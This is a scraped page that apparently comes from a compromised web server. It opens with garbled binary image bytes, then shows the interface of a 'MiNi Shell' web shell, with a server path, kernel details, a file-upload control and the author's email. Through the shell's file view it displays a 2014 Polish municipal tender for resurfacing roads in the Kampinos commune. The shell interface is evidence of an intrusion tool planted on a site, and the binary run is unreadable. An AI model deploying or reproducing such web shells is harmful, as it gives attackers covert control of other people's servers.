JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140506/151038-N-2014.html

<p class="kh_header"><b>Kampinos: Przebudowa nawierzchni dróg gminnych w miejscowościach Kwiatkówek, Łazy oraz Wola Pasikońska</b><br>
<b>Numer ogłoszenia: 151038 - 2014; data zamieszczenia: 06.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Kampinos , ul. Niepokalanowska 3, 05-085 Kampinos, woj. mazowieckie, tel. 0-22 725-00-40, faks 0-22 725-04-44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.kampinos.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa nawierzchni dróg gminnych w miejscowościach Kwiatkówek, Łazy oraz Wola Pasikońska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa nawierzchni dróg gminnych w miejscowości Kwiatkówek, Łazy oraz Wola Pasikońska. Przebudowa nawierzchni drogi gminnej w miejscowości Kwiatkówek,  dz. Nr ew 45, obręb Kwiatkówek. Prace będą polegały  na wykonaniu nakładki asfaltowej w dwóch warstwach, wiążącej i ścieralnej, o łącznej grubości 8 cm Obecnie jest to droga o nawierzchni  asfaltowej klasy KR1-2 wykonanej z warstwy destruktu asfaltowego na podbudowie z kamienia drogowego. Stan techniczny nawierzchni jest bardzo zły (liczne wyrwy, dziury, nierówności, wyboje). 
Parametry modernizowanej drogi:
- nawierzchnia drogi - destrukt asfaltowy
- długość drogi do remontu  - 400,0 m,
- powierzchnia zajmowana przez drogę - ok. 1280 m2,
- szerokość jezdni - 3,2 m,
- szerokość pobocza - od 0,5 m do 1,0 m
Wykonanie nowej nakładki asfaltowej ma polegać na: 
1. Oczyszczeniu nawierzchni  przy pomocy szczotek mechanicznych (czyszczenie nawierzchni i krawędzi jezdni )
2. Dwukrotne skropienie nawierzchni (warstwy istniejącej i warstwy wiążącej) lepiszczem przy użyciu skrapiarki. 
3. Wykonanie warstwy wyrównującej, wiążącej z mieszanki mineralno-asfaltowej, KR1-2, o grubości ok. 3 cm    ( BA0 na 12,0 ) 
4. Ułożenie siatki z włókien szklanych o wytrzymałości co najmniej 12kN na m powlekanej asfaltem w ilości zapewniającej dobre przyklejenie, zabezpieczonej folią oraz podsypką grysową, układaną maszynowo ze wstępnym naciągnięciem wraz ze stopieniem zabezpieczającej folii przed wbudowaniem siatki
5. Wykonanie warstwy ścieralnej z mieszanki mineralno-asfaltowej KR1-2 o grubości 5 cm -. ( BA0 na 12,0) 
4.Wyrównanie poboczy na szerokości  0,50m  od krawędzi jezdni, tak aby zapewnić swobodny odpływ wody nawierzchniowej z jezdni.
Do pracy będzie użyty sprzęt specjalistyczny (samochody, zamiatarki spryskiwacz i rozściełacz asfaltu)
Nachylenie nowej nakładki asfaltowej o profilu poprzecznie daszkowym dwustronnym
Materiał pomocniczy do sporządzenia oferty w postaci przedmiaru robót został załączony do specyfikacji. Przed złożeniem oferty Wykonawca winien dokonać wizji lokalnej w obecności przedstawiciela Zamawiającego w celu uściślenia sposobu i ilości planowanych prac. Przebudowa nawierzchni drogi gminnej w miejscowości Łazy. Przedmiotem planowanych prac jest przebudowa nawierzchni drogi przebiegającej przez miejscowość Łazy na dwóch odcinkach (dz. Nr ew. 127 i dz. Nr ew. 135). Pierwszy odcinek planowanej przebudowy drogi pokazany na załączonej mapie poglądowej będzie polegał na ułożeniu nowej nakładki asfaltowej składającej się z dwóch warstw asfaltu (warstwa wyrównująca - wiążąca i warstwa ścieralna) 
Obecnie jest to droga o nawierzchni asfaltowej klasy KR 1- 2 W miejscu planowanych prac, istniejąca  nawierzchnia jest mocno spękana z dużymi ubytkami asfaltu (dziury).
Parametry odcinka drogi do remontu:
- nawierzchnia drogi - asfalt
- długość drogi do remontu - 45 mb
- szerokość jezdni - 5,0 m
- powierzchnia remontowanego odcinka - 225,0 m2 
- szerokość pobocza -1,0 m
Wykonanie  nowej nakładki ma polegać na:
1. Oczyszczeniu nawierzchni  przy pomocy szczotek mechanicznych- czyszczenie nawierzchni i krawędzi jezdni, a następnie skropienie płynnym asfaltem.
2. Wyrównanie istniejącej nawierzchni asfaltowej mieszanką asfalto - betonu - średnio ok. 0,075 kg na m2 
3. Wykonanie warstwy ścieralnej z asfalto - betonu , g= 5 cm dla KR 3-4
4. Wyrównanie wschodniego  pobocza na szerokości 1,0m i utwardzenie go tłuczniem kamiennym na głębokości ok 20cm 
5. Nachylenie nowej nakładki asfaltowej o profilu poprzecznie daszkowym dwustronnym. Odprowadzenie wody na nieutwardzane pobocze.   
Drugi odcinek planowanej przebudowy drogi pokazany na załączonej mapie poglądowej będzie polegał na ułożeniu nowej nakładki asfaltowej składającej się z dwóch warstw asfaltu (warstwa wyrównująca - wiążąca i warstwa ścieralna), po uprzednim wykonaniu podbudowy z tłucznia kamiennego.
Odcinek od istniejącej nakładki asfaltowej do skrzyżowania o długości 73 m, będzie wykonany o szerokości 5,5 m. 
Parametry drugiego odcinka drogi do remontu:
- nawierzchnia drogi -  żużel piecowy i destrukt asfaltowy
- długość drogi do remontu - 73 m.
- szerokość jezdni - 5,5 m
- powierzchnia remontowanego odcinka - 401,5 m2 
- szerokość poboczy - od 0,5 do 1,0m

Wykonanie  nowej nakładki ma polegać na:
1. Wykorytowaniu drogi o założonych szerokościach na głębokość 23 cm
2. Wykonanie podbudowy z tłucznia kamiennego (0-31,5 mm) o grubości 15 cm po zagęszczeniu
3. Dwukrotne skropienie nawierzchni (warstwy istniejącej i warstwy wiążącej) lepiszczem przy użyciu skrapiarki. 
4. Wykonanie warstwy wyrównującej, wiążącej z mieszanki mineralno-asfaltowej, dla KR1-2, o grubości ok. 4 cm    ( BA0 na 12,0 ) 
5. Wykonanie warstwy ścieralnej z mieszanki mineralno-asfaltowej dla  KR1-2 o grubości 4 cm -. ( BA0 na 12,0) 
6. Wyrównanie poboczy na szerokości  0,50 m  od krawędzi jezdni, tak aby zapewnić swobodny odpływ wody nawierzchniowej z jezdni.
7. Do pracy będzie użyty sprzęt specjalistyczny ( samochody, zamiatarki spryskiwacz i rozściełacz asfaltu)
8. Nachylenie nowej nakładki asfaltowej o profilu poprzecznie daszkowym dwustronnym. Odprowadzenie wody na nieutwardzane pobocze.
Materiał pomocniczy do sporządzenia oferty w postaci przedmiaru robót został załączony do specyfikacji. Przed złożeniem oferty Wykonawca winien dokonać wizji lokalnej w obecności przedstawiciela Zamawiającego w celu uściślenia sposobu i ilości planowanych prac. Grunt z wykorytowania drogi Wykonawca wywiezie w miejsce wskazane przez Zamawiającego na odległość do 1 km. Część tego gruntu ( górna warstwa) może być wykorzystane do regulacji poboczy.
Przebudowa nawierzchni drogi gminnej w miejscowości Wola Pasikońska. Przedmiotem planowanych prac jest przebudowa nawierzchni drogi przebiegającej przez miejscowość  Wola Pasikońska (Dz. Nr ewid. 287)
Odcinek planowanej przebudowy drogi pokazany na załączonej mapie poglądowej będzie polegał na ułożeniu nowej nakładki asfaltowej, po uprzednim wykonaniu podbudowy z tłucznia kamiennego.
Odcinek od drogi wojewódzkiej nr 580 o długości 300,0 m, będzie wykonany o szerokości 4,0 m. 
Parametry odcinka drogi do remontu:
- nawierzchnia drogi -  żużel piecowy i destrukt asfaltowy
- długość drogi do remontu - 300 m.
- szerokość jezdni - 4,0 m
- powierzchnia remontowanego odcinka - 1200,0 m2 
- szerokość poboczy - od 0,5 do 1,0m
Wykonanie  nowej nakładki ma polegać na:
1. Wykorytowaniu drogi o założonych szerokościach na głębokość 23 cm
2. Wykonanie podbudowy z tłucznia kamiennego ( 0-31,5 mm) o grubości 15 cm po zagęszczeniu
3. Dwukrotne skropienie nawierzchni (warstwy istniejącej i warstwy wiążącej) lepiszczem przy użyciu skrapiarki. 
4. Wykonanie warstwy wyrównującej, wiążącej z mieszanki mineralno-asfaltowej, dla KR1-2, o grubości ok. 4 cm    ( BA0 na 12,0 ) 
5. Wykonanie warstwy ścieralnej z mieszanki mineralno-asfaltowej dla  KR1-2 o grubości 4 cm -. ( BA0 na 12,0) 
6. Wyrównanie poboczy na szerokości  0,5 m  od krawędzi jezdni, tak aby zapewnić swobodny odpływ wody nawierzchniowej z jezdni.
7. Do pracy będzie użyty sprzęt specjalistyczny (samochody, zamiatarki spryskiwacz i rozściełacz asfaltu)
8. Nachylenie nowej nakładki asfaltowej o profilu poprzecznie daszkowym dwustronnym. Odprowadzenie wody na nieutwardzane pobocze.
Materiał pomocniczy do sporządzenia oferty w postaci przedmiaru robót został załączony do specyfikacji. Przed złożeniem oferty Wykonawca winien dokonać wizji lokalnej w obecności przedstawiciela Zamawiającego w celu uściślenia sposobu i ilości planowanych prac. Grunt z wykorytowania drogi Wykonawca wywiezie w miejsce wskazane przez Zamawiającego na odległość do 5 km. Część tego gruntu ( górna warstwa) może być wykorzystane do regulacji poboczy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt. 6 i 7 Ustawy Prawo zamówień publicznych do wysokości 50% wartości zamówienia podstawowego. Jako podstawa do obliczenia wartości robót uzupełniających będą przyjęte wartości stanowiące dane wyjściowe do kosztorysowania zawarte w ofercie.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.00-1, 45.23.31.23-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnieniu warunków w postępowaniu (załącznik nr 1);
2. Oświadczenie o braku podstaw do wykluczenia (załącznik nr 2);
3. Ocena spełnienia warunków udziału w postępowania dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnieniu warunków w postępowaniu (załącznik nr 1);
2. Oświadczenie o braku podstaw do wykluczenia (załącznik nr 2);
3. Wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Wykaz powinien zawierać, co najmniej dwie roboty odpowiadające swoim rodzajem przedmiotowi zamówienia (tj. budowa dróg/przebudowa/remont dróg o nawierzchni asfaltowej) o wartości minimum 100 000 zł. (słownie: sto tysięcy złotych) brutto każda, (załącznik nr 4).
4. Ocena spełnienia warunków udziału w postępowania dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnieniu warunków w postępowaniu (załącznik nr 1);
2. Oświadczenie o braku podstaw do wykluczenia (załącznik nr 2);
3. Ocena spełnienia warunków udziału w postępowania dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnieniu warunków w postępowaniu (załącznik nr 1);
2. Oświadczenie o braku podstaw do wykluczenia (załącznik nr 2);
3. Oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (załącznik nr 5);
4. Ocena spełnienia warunków udziału w postępowania dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie o spełnieniu warunków w postępowaniu (załącznik nr 1);
2. Oświadczenie o braku podstaw do wykluczenia (załącznik nr 2);
3. Ocena spełnienia warunków udziału w postępowania dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień umowy lub któregokolwiek z załączników, stanowiących integralną część niniejszej umowy może nastąpić za zgodą obu stron, wyrażoną na piśmie w formie aneksu do umowy, pod rygorem nieważności.
2. Zmiana istotnych postanowień umowy w stosunku do treści umowy w stosunku do treści umowy może nastąpić zgodnie z art. 1 w następujących przypadkach:
1) jeśli zmiana przedmiotu umowy lub terminu jego wykonania jest korzystna dla Zamawiającego,
2) jeśli zmiana przedmiotu umowy lub terminu jej wykonania jest spowodowana przyczynami niezależnymi od stron umowy i niezawinionymi przez Wykonawcę, w szczególności w przypadku zaistnienia siły wyższej,
3) jeśli Wykonawca zmieni podwykonawcę lub podwykonawców, a zmiana nastąpi zgodnie z warunkami niniejszej umowy i przepisów prawa,
4) jeśli z przyczyn obiektywnych zajdzie konieczność zmiany sposobu wykonania robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kampinos.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kampinos, ul. Niepokalanowska 3, 05 - 085 Kampinos.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2014 godzina 12:00, miejsce: Urząd Gminy Kampinos, ul. Niepokalanowska 3, 05 - 085 Kampinos; pokój nr 4 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com